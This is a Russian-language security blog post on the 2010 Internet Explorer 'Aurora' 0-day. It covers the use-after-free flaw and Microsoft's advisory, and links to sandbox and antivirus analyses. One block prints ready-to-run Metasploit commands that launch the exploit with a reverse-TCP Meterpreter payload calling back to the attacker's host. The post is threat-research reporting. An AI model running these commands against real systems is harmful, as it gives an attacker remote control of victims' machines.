Очередной 0-day для IE, codname: \"Aurora\"

Очередной 0-day для IE, codname: \"Aurora\"
Только MS успела провести первый этом году Patch Tuesday, как сразу после этого (15.01.2010) Secunia выпустила бюллетень " Microsoft Internet Explorer Arbitrary Code Execution " в котором рассказывается о 0-day уязвимости, причем характерной для всей линейки IE начиная с шестого. В бюллетени речь идет об ошибки из-за не правильного разыменованого указателя, который после освобождения всеравно позволяет получить доступ к объекту. MS завела соответствующий Advisory (979352 ) и сообщила всему миру в одном из своих блогов , что пользователи Win7 с IE8 не уязвимы полюбому (DEP is enabled by default in IE 8) :)

Сейчас эксплойт уже доступен в составе баз Metasploit и доступен к использованию:


msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

На сам сплойт можно посмотреть здесь .
Вот подробное видео с иллюстрацией его работы:


The "Aurora" IE Exploit in Action from The Crew of Praetorian Prefect on Vimeo .


Результаты анализа боевого сплойта в песочнице Wepawet: http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js
Что-то не много его антивирусов на сегодняшний день детектит: http://www.virustotal.com/analisis/0793e8d10671762492091a9332b13321437977965e718761f5ef2c2ef298464a-1263646443

Update:
Код эксплойта на python

Update2:
Видео с работой эксплойта под разными версиями браузера IE (6/7/8) на XP c SP3:


Internet Exporer 6



Internet Exporer 7



Internet Exporer 8


Alt text

Большой брат следит за вами, но мы знаем, как остановить его

Подпишитесь на наш канал!

Александр Матросов

REFLECTIONS ABOUT REVERSE ENGINEERING, THREAT RESEARCH AND SOME MORE ...